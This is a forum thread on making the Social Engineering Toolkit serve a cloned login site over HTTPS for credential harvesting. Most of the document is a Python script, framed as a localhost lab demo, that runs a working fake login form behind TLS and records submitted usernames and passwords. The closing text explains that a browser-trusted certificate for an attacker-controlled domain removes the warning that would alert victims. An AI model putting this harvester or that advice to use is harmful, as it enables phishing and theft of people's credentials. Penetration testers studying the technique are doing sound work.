
Social Engineering Toolkit - Credential harvesting via https

I have SET up and running and functional for harvesting credentials for a cloned HTTPS site. However, the site is hosted in SET on the standard HTTP port 80. I am looking to be able to host the cloned site using HTTPS, as it adds an additional layer of reality to the cloned site. I think that it is also prudent to encrypt this traffic since you are capturing users' credentials. In the set_config file, you can change the web port, and I am able to change it to port 443; however, it still uses only standard HTTP without encryption. Has anyone tried something like this?

Re: Social Engineering Toolkit - Credential harvesting via https

Originally Posted by Agarax

Keep in mind that your modern web browser will start screaming at the user that he is trying to connect to a site with an unrecognized certificate ...

Agarax, it depends on whether SET does something like spoofing ARP or if it rewrites an HTML landing page to strip out SSL like Moxie's sslstrip. The former will result in screaming and the latter requires the user to not notice the missing padlock.

Re: Social Engineering Toolkit - Credential harvesting via https

Originally Posted by frankpuccino

Agarax, it depends on whether SET does something like spoofing ARP or if it rewrites an HTML landing page to strip out SSL like Moxie's sslstrip. The former will result in screaming and the latter requires the user to not notice the missing padlock.

Frank

Frank,

My understanding was that the OP was specifically talking about cloning the site and having the user connect to you with HTTPS instead of HTTP. In order for it to be HTTPS you need a cert. Otherwise the default use of port 80 already in the program would be adequate.

Only exception would be if you were able to grab the legit private key from the website during the pentest. But if you have enough access to the website to grab the private keys you don't need to go through the trouble of spoofing it and getting a user to connect, you can just set up listeners on the server.

Cheers,

Agarax

"If you haven’t trashed your computer while doing something questionable, then you’re not a computer scientist – you’re just an arts grad who didn’t get laid."

If the time stamp for my post is less than 15 minutes old, hold off on the flamethrower, there's a pretty decent chance I'm going to change it.
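The two points made in this thread (Agarax: serving the clone over HTTPS needs a certificate; frankpuccino: without a certificate the browser trusts, the user gets a warning, and only a user who clicks through ever reaches the form) can be seen end to end in a small lab script. The following is an added example, not SET's own code and not anything from set_config: it stands up a throwaway credential-harvesting page behind TLS on 127.0.0.1 with a self-signed certificate, then connects to it twice, once as a verifying client (what a browser does by default) and once with verification disabled (the user clicking past the warning). It assumes the `openssl` command-line tool is on PATH; the hostname `login.example.test` and the posted credentials are made up for the demo.

```python
"""Lab demo: a cloned login page served over HTTPS with a self-signed cert.
A verifying client (a browser) rejects it; only a client that disables
verification (a user clicking through the warning) reaches the form and
has its POSTed credentials recorded.

Added example for this thread, not SET's code. Assumes the openssl CLI
is on PATH. The CN login.example.test is a hypothetical hostname.
"""
import http.server
import os
import ssl
import subprocess
import tempfile
import threading
import urllib.error
import urllib.parse
import urllib.request

# Constructed stand-in for the cloned site's login page.
LOGIN_FORM = (b'<form method="post">'
              b'<input name="user"><input name="pass" type="password">'
              b'<input type="submit"></form>')


def make_self_signed_cert(workdir, cn="login.example.test"):
    """Generate a throwaway key pair and self-signed cert with the openssl CLI."""
    cert = os.path.join(workdir, "cert.pem")
    key = os.path.join(workdir, "key.pem")
    subprocess.run(
        ["openssl", "req", "-x509", "-newkey", "rsa:2048", "-nodes",
         "-keyout", key, "-out", cert, "-days", "1", "-subj", f"/CN={cn}"],
        check=True, capture_output=True)
    return cert, key


class HarvestHandler(http.server.BaseHTTPRequestHandler):
    """Serves the fake login form and records whatever is POSTed to it."""

    def log_message(self, *args):
        pass  # keep the demo quiet

    def _reply(self, body):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self._reply(LOGIN_FORM)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        self.server.harvested.append({k: v[0] for k, v in fields.items()})
        # SET would redirect the victim to the real site here; a plain 200
        # keeps this demo self-contained (no DNS, no real site involved).
        self._reply(b"<p>Please try again.</p>")


def start_https_server(cert, key, port=0):
    """Bind the harvester on localhost and wrap its listening socket in TLS.
    port=0 picks a free ephemeral port; a real deployment would use 443."""
    srv = http.server.HTTPServer(("127.0.0.1", port), HarvestHandler)
    srv.harvested = []
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(cert, key)
    srv.socket = ctx.wrap_socket(srv.socket, server_side=True)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(port, verify=True, creds=None):
    """Connect the way a browser would. verify=True is default browser
    behaviour (the certificate warning); verify=False is the user
    clicking through it. Returns ("rejected", why) or ("ok", status)."""
    ctx = ssl.create_default_context()
    if not verify:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    data = urllib.parse.urlencode(creds).encode() if creds else None
    try:
        with urllib.request.urlopen(f"https://127.0.0.1:{port}/", data=data,
                                    context=ctx, timeout=5) as resp:
            return "ok", resp.status
    except urllib.error.URLError as err:
        if isinstance(err.reason, ssl.SSLCertVerificationError):
            return "rejected", "certificate verification failed"
        return "rejected", str(err.reason)


def demo():
    """Run the whole exchange and report what each side saw."""
    workdir = tempfile.mkdtemp()
    cert, key = make_self_signed_cert(workdir)
    srv = start_https_server(cert, key)
    port = srv.server_address[1]
    try:
        return {
            "verifying_client": probe(port, verify=True),
            "clicked_through": probe(port, verify=False,
                                     creds={"user": "alice", "pass": "hunter2"}),
            "harvested": list(srv.harvested),
        }
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

The verifying connection never reaches the form at all: the client aborts the TLS handshake on the untrusted certificate, so nothing is harvested. The second connection, with verification switched off, completes and the posted form fields land in `srv.harvested`. Swapping the self-signed pair for a certificate the victim's browser already trusts (one issued for a domain you control, or, as Agarax notes, the target's own key if the engagement scope allowed for that) is what removes the warning; changing WEB_PORT on its own only moves the plaintext listener to 443.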